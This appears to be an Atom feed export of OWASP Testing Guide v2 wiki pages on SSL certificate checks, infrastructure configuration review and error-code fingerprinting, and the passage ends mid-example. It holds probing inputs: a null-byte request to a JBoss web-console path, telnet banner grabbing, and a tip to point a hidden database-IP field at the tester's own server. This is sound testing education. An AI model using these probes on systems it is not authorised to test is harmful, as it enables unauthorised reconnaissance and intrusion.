c) What if the name on the certificate and the name of the server do not match? If this happens, it might sound suspicious. For a number of reasons, this is not so rare to see. A system may host a number of name-based virtual hosts, which share the same IP address and are identified by means of the HTTP 1.1 Host: header information. In this case, since the SSL handshake checks the server certificate before the HTTP request is processed, it is not possible to assign different certificates to each virtual server. Therefore, if the name of the site and the name reported in the certificate do not match, we have a condition which is typically signalled by the browser. To avoid this, IP-based virtual servers must be used. [2] and [3] describe techniques to deal with this problem and allow name-based virtual hosts to be correctly referenced.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Black Box Testing and examples===&lt;br /&gt;
&lt;br /&gt;
Examine the validity of the certificates used by the application. Browsers will issue a warning when encountering expired certificates, certificates issued by untrusted CAs, and certificates whose names do not match the name of the site to which they should refer. By clicking on the padlock which appears in the browser window when visiting an https site, you can look at information related to the certificate – including the issuer, period of validity, encryption characteristics, etc.&lt;br /&gt;
&lt;br /&gt;
If the application requires a client certificate, you probably have installed one to access it. Certificate information is available in the browser by inspecting the relevant certificate(s) in the list of the installed certificates.&lt;br /&gt;
&lt;br /&gt;
These checks must be applied to all visible SSL-wrapped communication channels used by the application. Though this is the usual https service running on port 443, there may be additional services involved depending on the web application architecture and on deployment issues (an https administrative port left open, https services on non-standard ports, etc.). Therefore, apply these checks to all SSL-wrapped ports which have been discovered. For example, the nmap scanner features a scanning mode (enabled by the –sV command line switch) which identifies SSL-wrapped services. The Nessus vulnerability scanner has the capability of performing SSL checks on all SSL/TLS-wrapped services.&lt;br /&gt;
&lt;br /&gt;
'''Examples'''&lt;br /&gt;
&lt;br /&gt;
Rather than providing a fictitious example, we have inserted an anonymized real-life example to stress how frequently one stumbles on https sites whose certificates are inaccurate with respect to naming.&lt;br /&gt;
&lt;br /&gt;
The following screenshots refer to a regional site of a high-profile IT company.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;Warning issued by Microsoft Internet Explorer.&amp;lt;/u&amp;gt; We are visiting a ''.it'' site and the certificate was issued to a ''.com ''site! Internet Explorer warns that the name on the certificate does not match the name of the site.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Image:SSL Certificate Validity Testing IE Warning.gif]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;Warning issued by Mozilla Firefox.&amp;lt;/u&amp;gt; The message issued by Firefox is different – Firefox complains because it cannot ascertain the identity of the ''.com'' site the certificate refers to because it does not know the CA which signed the certificate. In fact, Internet Explorer and Firefox do not come preloaded with the same list of CAs. Therefore, the behavior experienced with various browsers may differ.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Image:SSL Certificate Validity Testing Firefox Warning.gif]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===White Box Testing and examples===&lt;br /&gt;
&lt;br /&gt;
Examine the validity of the certificates used by the application at both server and client levels. The usage of certificates is primarily at the web server level; however, there may be additional communication paths protected by SSL (for example, towards the DBMS). You should check the application architecture to identify all SSL protected channels.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==References==&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
* [1] RFC2246. The TLS Protocol Version 1.0 (updated by RFC3546) - http://www.ietf.org/rfc/rfc2246.txt&lt;br /&gt;
* [2] RFC2817. Upgrading to TLS Within HTTP/1.1 - http://www.ietf.org/rfc/rfc2817.txt&lt;br /&gt;
* [3] RFC3546. Transport Layer Security (TLS) Extensions - http://www.ietf.org/rfc/rfc3546.txt&lt;br /&gt;
* [4] &amp;lt;u&amp;gt;www.verisign.net&amp;lt;/u&amp;gt; features various material on the topic&lt;br /&gt;
&lt;br /&gt;
'''Tools'''&lt;br /&gt;
&lt;br /&gt;
* Vulnerability scanners may include checks regarding certificate validity, including name mismatch and time expiration. They usually report other information as well, such as the CA which issued the certificate. Remember that there is no unified notion of a “trusted CA”; what is trusted depends on the configuration of the software and on the human assumptions made beforehand. Browsers come with a preloaded list of trusted CAs. If your web application relies on a CA which is not in this list (for example, because you rely on a self-made CA), you should take into account the process of configuring user browsers to recognize the CA.&lt;br /&gt;
&lt;br /&gt;
* The Nessus scanner includes a plugin to check for expired certificates or certificates which are going to expire within 60 days (plugin &amp;quot;SSL certificate expiry&amp;quot;, plugin id 15901). This plugin will check certificates installed on the server.&lt;br /&gt;
&lt;br /&gt;
* Vulnerability scanners may include checks against weak ciphers. For example, the Nessus scanner (http://www.nessus.org) has this capability and flags the presence of SSL weak ciphers (see example provided above).&lt;br /&gt;
&lt;br /&gt;
* You may also rely on specialized tools such as SSL Digger (http://www.foundstone.com/resources/proddesc/ssldigger.htm), or – for the command line oriented – experiment with the openssl tool, which provides access to OpenSSL cryptographic functions directly from a Unix shell (may be already available on *nix boxes, otherwise see www.openssl.org).&lt;br /&gt;
&lt;br /&gt;
* To identify SSL-based services, use a vulnerability scanner or a port scanner with service recognition capabilities. The nmap scanner features a “-sV” scanning option which tries to identify services, while the Nessus vulnerability scanner has the capability of identifying SSL-based services on arbitrary ports and of running vulnerability checks on them regardless of whether they are configured on standard or non-standard ports.&lt;br /&gt;
&lt;br /&gt;
* In case you need to talk to an SSL service but your favourite tool doesn’t support SSL, you may benefit from an SSL proxy such as stunnel; stunnel will take care of tunneling the underlying protocol (usually http, but not necessarily so) and communicate with the SSL service you need to reach.&lt;br /&gt;
&lt;br /&gt;
* Finally, a word of advice. Though it may be tempting to use a regular browser to check certificates, there are various reasons for not doing so. Browsers have been plagued by various bugs in this area, and the way the browser will perform the check might be influenced by configuration settings that may not be evident. Instead, rely on vulnerability scanners or on specialized tools to do the job.&lt;br /&gt;
&lt;br /&gt;
[[Category:Cryptographic Vulnerability]]&lt;br /&gt;
[[Category:SSL]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Katie.mcdowell</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Test_Network/Infrastructure_Configuration_(OTG-CONFIG-001)&amp;diff=14833</id>
		<title>Test Network/Infrastructure Configuration (OTG-CONFIG-001)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Test_Network/Infrastructure_Configuration_(OTG-CONFIG-001)&amp;diff=14833"/>
				<updated>2007-01-02T21:56:44Z</updated>
		
		<summary type="html">&lt;p&gt;Katie.mcdowell: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
The intrinsic complexity of interconnected and heterogeneous web server infrastructure, which can count hundreds of web applications, makes configuration management and review a fundamental step in testing and deploying every single application.&lt;br /&gt;
In fact it takes only a single vulnerability to undermine the security of the entire infrastructure, and even small and (almost) unimportant problems may evolve into severe risks for another application on the same server.&lt;br /&gt;
In order to address these problems, it is of utmost importance to perform an in-depth review of configuration and known security issues.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
&lt;br /&gt;
Proper configuration management of the web server infrastructure is very important in order to preserve the security of the application itself. If elements such as the web server software, the back-end database servers, or the authentication servers are not properly reviewed and secured, they might introduce undesired risks or introduce new vulnerabilities that might compromise the application itself.&lt;br /&gt;
&lt;br /&gt;
For example, a web server vulnerability that would allow a remote attacker to disclose the source code of the application itself (a vulnerability that has arisen a number of times in both web servers or application servers) could compromise the application, as anonymous users could use the information disclosed in the source code to leverage attacks against the application or its users.&lt;br /&gt;
&lt;br /&gt;
In order to test the configuration management infrastructure, the following steps need to be taken:&lt;br /&gt;
&lt;br /&gt;
* the different elements that make up the infrastructure need to be determined in order to understand how they interact with a web application and how they affect its security&lt;br /&gt;
* all the elements of the infrastructure need to be reviewed in order to make sure that they don’t hold any known vulnerabilities&lt;br /&gt;
* a review needs to be made of the administrative tools used to maintain all the different elements&lt;br /&gt;
* the authentication systems, if any, need to be reviewed in order to ensure that they serve the needs of the application and that they cannot be manipulated by external users to gain access.&lt;br /&gt;
* A list of defined ports which are required for the application should be maintained and kept under change control.&lt;br /&gt;
&lt;br /&gt;
== Black Box Testing and examples==&lt;br /&gt;
&lt;br /&gt;
===Review of the application architecture===&lt;br /&gt;
&lt;br /&gt;
The application architecture needs to be reviewed through the test to determine what different components are used to build the web application. In small setups, such as a simple CGI-based application, a single server might be used that runs the web server which executes the C, Perl, or shell CGI applications, and perhaps authentication is also based on the web server's authentication mechanisms. In more complex setups, such as an online banking system, multiple servers might be involved, including a reverse proxy, a front-end web server, an application server, and a database or LDAP server. Each of these servers will be used for different purposes and might even be divided into different networks with firewalling devices between them, creating different DMZs so that access to the web server will not grant a remote user access to the authentication mechanism itself, and so that compromises of the different elements of the architecture can be isolated in a way that they will not compromise the whole architecture.&lt;br /&gt;
&lt;br /&gt;
Getting knowledge of the application architecture can be easy if this information is provided to the testing team by the application developers in document form or through interviews, but can also prove to be very difficult if doing a blind penetration test.&lt;br /&gt;
&lt;br /&gt;
In the latter case, a tester will first start with the assumption that there is a simple setup (a single server) and will, through the information retrieved from other tests, derive the different elements, revising this assumption as the architecture proves to be more complex. The tester will start by asking simple questions such as: “Is there a firewalling system protecting the web server?”, which will be answered based on the results of network scans targeted at the web server and the analysis of whether the network ports of the web server are being filtered at the network edge (no answer or ICMP unreachables are received) or whether the server is directly connected to the Internet (i.e., it returns RST packets for all non-listening ports). This analysis can be enhanced in order to determine the type of firewall system used based on network packet tests: is it a stateful firewall or is it an access list filter on a router? How is it configured? Can it be bypassed? &lt;br /&gt;
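The RST-versus-silence reasoning above can be sketched as a small probe. The helper below is a hypothetical illustration, assuming direct TCP access to the target; host and port values are whatever the tester supplies.&lt;br /&gt;

```python
import socket

def classify_port(host, port, timeout=3.0):
    """Probe one TCP port and interpret the outcome as described above:
    an RST (connection refused) suggests no filtering device in the path,
    while silence (a timeout) suggests a firewall dropping packets."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return "open"
    except ConnectionRefusedError:
        return "closed"       # RST received: likely directly connected
    except socket.timeout:
        return "filtered"     # no answer: likely a firewall in between
    except OSError:
        return "unreachable"  # ICMP error: likely a filtering router
```

Repeating this over a range of non-listening ports distinguishes a directly connected server (mostly "closed") from one behind a packet filter (mostly "filtered").&lt;br /&gt;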
&lt;br /&gt;
Detecting a reverse proxy in front of the web server needs to be done by the analysis of the web server banner, which might directly disclose the existence of a reverse proxy (for example, if ‘WebSEAL’[1] is returned). It can also be determined by obtaining the answers given by the web server to requests and comparing them to the expected answers. For example, some reverse proxies act as “intrusion prevention systems” (or web-shields) by blocking known attacks targeted at the web server. If the web server is known to answer with a 404 message to a request which targets an unavailable page, but returns a different error message for some common web attacks like those done by CGI scanners, it might be an indication of a reverse proxy (or an application-level firewall) which is filtering the requests and returning a different error page than the one expected. Another example: if the web server returns a set of available HTTP methods (including TRACE) but the expected methods return errors, then there is probably something in between blocking them. In some cases, even the protection system gives itself away:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
GET / web-console/ServerInfo.jsp%00 HTTP/1.0&lt;br /&gt;
&lt;br /&gt;
HTTP/1.0 200&lt;br /&gt;
Pragma: no-cache&lt;br /&gt;
Cache-Control: no-cache&lt;br /&gt;
Content-Type: text/html&lt;br /&gt;
Content-Length: 83&lt;br /&gt;
&lt;br /&gt;
&amp;lt;TITLE&amp;gt;Error&amp;lt;/TITLE&amp;gt;&lt;br /&gt;
&amp;lt;BODY&amp;gt;&lt;br /&gt;
&amp;lt;H1&amp;gt;Error&amp;lt;/H1&amp;gt;&lt;br /&gt;
FW-1 at XXXXXX: Access denied.&amp;lt;/BODY&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Example of the security server of Check Point Firewall-1 NG AI “protecting” a web server'''&lt;br /&gt;
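As a rough sketch of this comparison technique, the hypothetical helper below contrasts the server's normal 404 behaviour with its response to an attack-style request; the marker strings are a small illustrative sample (including the Firewall-1 page shown above), not a real rule set.&lt;br /&gt;

```python
# Markers often left by protection devices in their own error pages
# (illustrative sample only, e.g. the Firewall-1 page shown above).
SHIELD_MARKERS = ("FW-1 at", "Access denied", "WebSEAL")

def looks_filtered(attack_status, attack_body, normal_404_status=404):
    """Return True when an attack-style request is answered differently
    from a plain request for a non-existent page, hinting at a reverse
    proxy or application-level firewall in front of the web server."""
    if attack_status != normal_404_status:
        return True
    return any(marker in attack_body for marker in SHIELD_MARKERS)
```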
&lt;br /&gt;
Reverse proxies can also be introduced as proxy-caches to accelerate the performance of back-end application servers. Detecting these proxies can be done based, again, on the server header, or by timing requests that should be cached by the server and comparing the time taken to serve the first request with subsequent requests.&lt;br /&gt;
&lt;br /&gt;
Another element that can be detected: network balancers. Typically, these systems will balance a given TCP/IP port to multiple servers based on different algorithms (round-robin, web server load, number of requests, etc.). Thus, the detection of these architecture elements needs to be done by examining multiple requests and comparing results in order to determine whether the requests are going to the same or different web servers -- for example, based on the Date: header if the server clocks are not synchronised. In some cases, the network load balancer might inject new information in the headers that will make it stand out distinctively, like the AlteonP cookie introduced by Nortel’s Alteon WebSystems load balancer.&lt;br /&gt;
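A minimal sketch of this comparison, assuming the tester has already captured the response headers of several identical requests as dictionaries; the 2-second skew threshold is an arbitrary assumption.&lt;br /&gt;

```python
from email.utils import parsedate_to_datetime

def balancer_hints(responses, max_skew_seconds=2.0):
    """Look for signs of a load balancer across repeated responses:
    Date headers that disagree (unsynchronised server clocks) or a
    known balancer cookie such as Nortel Alteon's 'AlteonP'."""
    hints = []
    dates = [parsedate_to_datetime(r["Date"]) for r in responses if "Date" in r]
    if dates and (max(dates) - min(dates)).total_seconds() > max_skew_seconds:
        hints.append("Date header skew")
    if any("AlteonP" in r.get("Set-Cookie", "") for r in responses):
        hints.append("AlteonP cookie")
    return hints
```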
&lt;br /&gt;
Application web servers are usually easy to detect -- the request for several resources is handled by the application server itself (not the web server) and the response header will vary significantly (including different or additional values in the answer header). Another way to detect these is to see if the web server tries to set cookies which are indicative of an application web server being used (such as the JSESSIONID provided by some J2EE servers), or to rewrite URLs automatically to do session tracking.&lt;br /&gt;
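This cookie-based detection can be sketched as a simple lookup; the name-to-technology mapping below is indicative only, not an authoritative signature set.&lt;br /&gt;

```python
# Well-known session cookie names and the technology they suggest
# (indicative mapping, not exhaustive).
SESSION_COOKIE_HINTS = {
    "JSESSIONID": "J2EE application server",
    "PHPSESSID": "PHP",
    "ASP.NET_SessionId": "ASP.NET",
    "CFID": "ColdFusion",
}

def guess_app_server(set_cookie_header):
    """Guess the server-side technology from a Set-Cookie header."""
    lowered = set_cookie_header.lower()
    for name, tech in SESSION_COOKIE_HINTS.items():
        if name.lower() in lowered:
            return tech
    return None
```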
&lt;br /&gt;
Authentication backends (such as LDAP directories, relational databases, or RADIUS servers) however, are not as easy to detect from an external point of view in an immediate way, since they will be hidden by the application itself.&lt;br /&gt;
&lt;br /&gt;
The use of a database backend can be determined simply by navigating an application. If there is highly dynamic content generated “on the fly,&amp;quot; it is probably being extracted from some sort of database by the application itself. Sometimes the way information is requested might give insight to the existence of a database back-end. (For example, an online shopping application that uses numeric identifiers (‘id’) when browsing the different articles in the shop.) However, when doing a blind application test, knowledge of the underlying database is usually only available when some vulnerability surfaces in the application, such as an SQL injection, which indicates that the application is actually talking to a database (the vulnerability would not be possible otherwise).&lt;br /&gt;
&lt;br /&gt;
===Known server vulnerabilities===&lt;br /&gt;
&lt;br /&gt;
Vulnerabilities found in the different elements that make up the application architecture, be it the web server itself or the database backend, can severely compromise the application itself, sometimes even more so than a vulnerability in the actual application. For example, consider a server vulnerability that allows a remote, unauthenticated user to upload files to the web server, or even to replace files. This vulnerability would compromise the application, since a rogue user would be able to replace the application itself or introduce code that would affect the backend servers, as the rogue code would be run just like any other application code.&lt;br /&gt;
&lt;br /&gt;
Reviewing server vulnerabilities can be hard to do if the test needs to be done through a blind penetration test. In these cases, vulnerabilities need to be tested from a remote site, typically using an automated tool; however, testing some vulnerabilities can have unpredictable results on the web server, and testing for others (like those directly involved in denial of service attacks) might not be possible due to the service downtime involved if the test were successful. Also, some automated tools will flag vulnerabilities based on the web server version retrieved. This leads to both false positives and false negatives: on one hand, if the web server version has been removed or obscured by the local site administrator, the scan tool will not flag the server as vulnerable even if it is; on the other hand, if the vendor providing the software does not update the web server version when vulnerabilities are fixed in it, the scan tool will flag vulnerabilities that do not exist. The latter case is actually very common with some operating system vendors that backport patches for security vulnerabilities to the software they provide in the operating system but do not do a full upgrade to the latest software version. This happens in most GNU/Linux distributions such as Debian, Red Hat or SuSE. In most cases, vulnerability scanning of an application architecture will only find vulnerabilities associated with the “exposed” elements of the architecture (such as the web server) and will usually be unable to find vulnerabilities associated with elements which are not directly exposed, such as the authentication backends, the database backends, or reverse proxies in use.&lt;br /&gt;
&lt;br /&gt;
Finally, not all software vendors disclose vulnerability information in a public way, and information on the vulnerabilities present in their different releases is not always published in vulnerability databases[2]. This information is only disclosed to customers, or published through fixes that do not have accompanying advisories. This reduces the usefulness of vulnerability scanning tools. Typically, vulnerability coverage of these tools will be very good for common products (such as the Apache web server, Microsoft’s Internet Information Server, or IBM’s Lotus Domino) but will be lacking for lesser known products.&lt;br /&gt;
&lt;br /&gt;
This is why reviewing vulnerabilities is best done when the tester is provided with internal information on the software used, including the versions and releases in use and the patches applied to the software. With this information in hand, the tester can retrieve the information from the vendor itself and analyse what vulnerabilities might be present in the architecture and how they can affect the application itself. When possible, these vulnerabilities can be tested in order to determine their real effects and to detect if there might be any external elements (such as intrusion detection or prevention systems) that might reduce or negate the possibility of exploiting them. Testers might even determine, through a configuration review, that the vulnerability is not even present, since it affects a software component that is not in use.&lt;br /&gt;
&lt;br /&gt;
It is also worth noting that vendors will sometimes silently fix vulnerabilities and make the fixes available in new software releases. Different vendors will have different release cycles that determine the support they might provide for older releases. A tester with detailed information on the software versions used by the architecture can analyse the risk associated with the use of old software releases that might be unsupported in the short term or are already unsupported. This is critical, since if a vulnerability were to surface in an old software version that is no longer supported, the systems personnel might not be directly aware of it: no patches will ever be made available for it, and advisories might not list that version as vulnerable (as it is unsupported). Even in the event that they are aware that the vulnerability is present and the system is, indeed, vulnerable, they will need to do a full upgrade to a new software release, which might introduce significant downtime in the application architecture or might force the application to be recoded due to incompatibilities with the latest software version.&lt;br /&gt;
&lt;br /&gt;
===Administrative tools===&lt;br /&gt;
&lt;br /&gt;
Any web server infrastructure requires the existence of administrative tools to maintain and update the information used by the application: static content (web pages, graphic files), application source code, user authentication databases, etc. Depending on the site, technology, or software used, administrative tools will differ. For example, some web servers will be managed using administrative interfaces which are, themselves, web servers (such as the iPlanet web server), will be administered through plain text configuration files (in the Apache case[3]), or will use operating-system GUI tools (when using Microsoft’s IIS server or ASP.NET). In most cases, however, the server configuration will be handled using different tools than the maintenance of the files used by the web server, which are managed through FTP servers, WebDAV, network file systems (NFS, CIFS) or other mechanisms. Obviously, the operating system of the elements that make up the application architecture will also be managed using other tools. Applications may also have administrative interfaces embedded in them that are used to manage the application data itself (users, content, etc.)&lt;br /&gt;
&lt;br /&gt;
Review of the administrative interfaces used to manage the different parts of the architecture is very important, since if a user gains access to any of them he can then compromise or damage the application architecture. Thus it is important to:&lt;br /&gt;
&lt;br /&gt;
* list all the possible administrative interfaces.&lt;br /&gt;
* determine if administrative interfaces are available from an internal network or are also available from the Internet.&lt;br /&gt;
* if available from the Internet, determine the access control methods used to access these interfaces and their susceptibilities.&lt;br /&gt;
&lt;br /&gt;
Some sites do not fully manage their web server applications directly; they may have other companies manage the content provided by the web server application. This external company might provide only parts of the content (news updates or promotions) or might manage the web server completely (including content and code). It is common to find administrative interfaces available from the Internet in these situations, since using the Internet is cheaper than providing a dedicated line connecting the external company to the application infrastructure through a management-only interface. In this situation, it is very important to test whether the administrative interfaces can be vulnerable to attacks. &lt;br /&gt;
&lt;br /&gt;
==References==&lt;br /&gt;
* [1] WebSEAL, also known as Tivoli Authentication Manager, is a reverse Proxy from IBM which is part of the Tivoli framework.&lt;br /&gt;
* [2] Such as Symantec’s Bugtraq, ISS’ Xforce, or NIST’s National Vulnerability Database (NVD)&lt;br /&gt;
* [3] There are some GUI-based administration tools for Apache (like NetLoony) but they are not in widespread use yet.&lt;br /&gt;
* [4] The use of database back-ends for authentication purposes is very common, with user tables that include users' passwords in plain text.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Katie.mcdowell</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_Error_Code_(OTG-ERR-001)&amp;diff=14832</id>
		<title>Testing for Error Code (OTG-ERR-001)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_Error_Code_(OTG-ERR-001)&amp;diff=14832"/>
				<updated>2007-01-02T21:18:32Z</updated>
		
		<summary type="html">&lt;p&gt;Katie.mcdowell: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
&lt;br /&gt;
Often during a penetration test on web applications we come up against many error codes generated from applications or web servers.&lt;br /&gt;
It's possible to cause these errors to be displayed by using a particular request, either specially crafted with tools or created manually.&lt;br /&gt;
These codes are very useful to a pentester during his activities because they reveal a lot of information about databases, bugs, and other technological components directly linked with web applications.&lt;br /&gt;
In the first part we'll analyse the most common codes (error messages) and bring into focus the steps of vulnerability assessment.&lt;br /&gt;
The most important aspect of this activity is to focus one's attention on these errors, seeing them as a collection of information that will aid the next steps of our analysis. A good collection can increase the efficiency of the penetration test by decreasing the overall time taken.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue ==&lt;br /&gt;
&lt;br /&gt;
A common error that we can see during our search is the HTTP 404 Not Found.&lt;br /&gt;
Often we can see this error code with many details about the web server and other components.&lt;br /&gt;
For Example:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Not Found&lt;br /&gt;
The requested URL /page.html was not found on this server.&lt;br /&gt;
Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7g  DAV/2 PHP/5.1.2 Server at localhost Port 80&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This error message can be generated by requesting a non-existent URL.&lt;br /&gt;
After the common message that shows a page not found, there is information about the web server version, OS, modules, and other products used.&lt;br /&gt;
This information, covering both the OS and the applications, can be very important during a penetration test; but web server errors aren't the only errors useful in a security analysis.&lt;br /&gt;
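The server signature shown in the example above can be pulled apart programmatically. The sketch below is a hypothetical helper assuming the default Apache error-page footer format.&lt;br /&gt;

```python
import re

def parse_apache_signature(error_page):
    """Extract the server signature footer of a default Apache error
    page, e.g. 'Apache/2.2.3 (Unix) mod_ssl/2.2.3 ... Server at
    localhost Port 80', and split it into its components."""
    match = re.search(r"(Apache/\S.*?)\s+Server at\s+(\S+)\s+Port\s+(\d+)",
                      error_page)
    if not match:
        return None
    return {
        "components": match.group(1).split(),  # server and module versions
        "host": match.group(2),
        "port": int(match.group(3)),
    }
```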
&lt;br /&gt;
We will therefore look at the next occurrence, which shows abnormal behavior:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)&lt;br /&gt;
[DBNETLIB][ConnectionOpen(Connect())] - SQL server does not exist or access denied &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
What's happened? We'll proceed step by step.&lt;br /&gt;
&lt;br /&gt;
For example, 80004005 is a generic IIS error code which indicates that it isn't possible to access a database.&amp;lt;br&amp;gt;&lt;br /&gt;
In many cases we can see that this code is followed by the version of the database. With this information, the pentester can plan an appropriate strategy for the security test.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Microsoft OLE DB Provider for ODBC Drivers error '80004005'&lt;br /&gt;
[Microsoft][ODBC Access 97 ODBC driver Driver]General error Unable to open registry key 'DriverId'&lt;br /&gt;
&amp;lt;/pre&amp;gt; 	&lt;br /&gt;
&lt;br /&gt;
The first example shows a connection error message returned by a SQL Server database because the database server linked to the application is down or the credentials don't allow access.&lt;br /&gt;
However, this isn't the only information we obtain; in fact, in this way we have also discovered the kind of operating system in use.&lt;br /&gt;
In this case we could verify whether the web application permits changing the values of the variables used to connect to the database.&lt;br /&gt;
In the second case we can see a generic error in the same situation (we know the database version) but with a different error message and database server.&lt;br /&gt;
But in the end...It's the same thing!&lt;br /&gt;
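This kind of fingerprinting can be sketched as a substring match over the error text; the marker list below is a small illustrative sample drawn from the examples here, not a complete signature set.&lt;br /&gt;

```python
# (marker substring, likely back-end) pairs -- illustrative only.
DB_ERROR_FINGERPRINTS = [
    ("[MySQL][ODBC", "MySQL"),
    ("[DBNETLIB]", "Microsoft SQL Server"),
    ("ODBC Access 97", "Microsoft Access"),
    ("ORA-", "Oracle"),
]

def fingerprint_db(error_message):
    """Guess the back-end database from an ODBC/OLE DB error message."""
    for marker, db in DB_ERROR_FINGERPRINTS:
        if marker in error_message:
            return db
    return None
```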
&lt;br /&gt;
Now we will look at a practical example: a security test on a web application that loses its link with the database server because of badly written code (the next error message is caused by the application when it can't resolve the database server name, or when the variable value is modified) or other network problems.&lt;br /&gt;
&lt;br /&gt;
For example, we have a database administration web portal which connects to the database server after a log-on phase in order to run queries, create tables, and modify database fields.&lt;br /&gt;
During the POST of credentials for the log-on phase, we meet this message, which evidences the presence of a MySQL database server:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)&lt;br /&gt;
[MySQL][ODBC 3.51 Driver]Unknown MySQL server host&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
		&lt;br /&gt;
If we see in the HTML code of the log-on page the presence of a '''hidden field''' with a database IP, we can try to change this value in the URL with the address of another database (our database, for example).&lt;br /&gt;
Another example: knowing the database server that services a web application, we can take advantage of this information to carry out a SQL Injection for that kind of database or a persistent XSS test.&lt;br /&gt;
&lt;br /&gt;
Information Gathering on web applications with server-side technology is quite difficult, but the information discovered can be useful for the correct execution of an attempted exploit and can reduce false positives.&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
&lt;br /&gt;
'''Test:'''&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
telnet &amp;lt;host target&amp;gt; 80&lt;br /&gt;
GET /&amp;lt;wrong page&amp;gt; HTTP/1.1&lt;br /&gt;
&amp;lt;CRLF&amp;gt;&amp;lt;CRLF&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
'''Result:'''&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
HTTP/1.1 404 Not Found&lt;br /&gt;
Date: Sat, 04 Nov 2006 15:26:48 GMT&lt;br /&gt;
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7g&lt;br /&gt;
Content-Length: 310&lt;br /&gt;
Connection: close&lt;br /&gt;
Content-Type: text/html; charset=iso-8859-1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
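The telnet test above can also be scripted. The hypothetical helper below only builds the raw request bytes; note that HTTP/1.1 requires a Host header, which is easy to forget when typing the request by hand.&lt;br /&gt;

```python
def http_probe_request(host, path="/this_page_does_not_exist"):
    """Build the raw banner-grabbing request shown in the test above.
    The path is an arbitrary non-existent page chosen to trigger a 404."""
    return (f"GET {path} HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            f"Connection: close\r\n"
            f"\r\n").encode()
```

The resulting bytes can be sent over a plain TCP socket to port 80 and the response headers read back, exactly as in the telnet transcript.&lt;br /&gt;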
'''Test:'''&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
1. network problems&lt;br /&gt;
2. bad configuration about host database address&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
'''Result:'''&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Microsoft OLE DB Provider for ODBC Drivers (0x80004005) '&lt;br /&gt;
[MySQL][ODBC 3.51 Driver]Unknown MySQL server host&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
'''Test:'''&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
1. Authentication Failed&lt;br /&gt;
2. Credentials not inserted&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
'''Result:'''&lt;br /&gt;
&lt;br /&gt;
Firewall version used for authentication&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Error 407&lt;br /&gt;
FW-1 at &amp;lt;firewall&amp;gt;: Unauthorized to access the document.&lt;br /&gt;
•  Authorization is needed for FW-1.&lt;br /&gt;
•  The authentication required by FW-1 is: unknown.&lt;br /&gt;
•  Reason for failure of last attempt: no user&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example ==&lt;br /&gt;
&lt;br /&gt;
'''Test:'''&lt;br /&gt;
&lt;br /&gt;
Enumeration of the directories with access denied.&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
